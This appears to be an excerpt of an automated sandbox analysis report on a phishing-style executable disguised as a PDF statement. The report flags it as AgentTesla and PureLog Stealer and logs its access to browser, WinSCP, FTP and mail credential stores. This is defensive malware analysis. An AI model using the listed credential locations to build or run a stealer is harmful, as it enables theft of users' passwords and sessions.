                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Users\user\Desktop\Statement of Account PDF.bat.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.0000000003574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 7252, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gDdsxauPhk.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7752, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.7600000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.3949970.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1700653245.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1710196910.0000000007600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 7252, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gDdsxauPhk.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7752, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
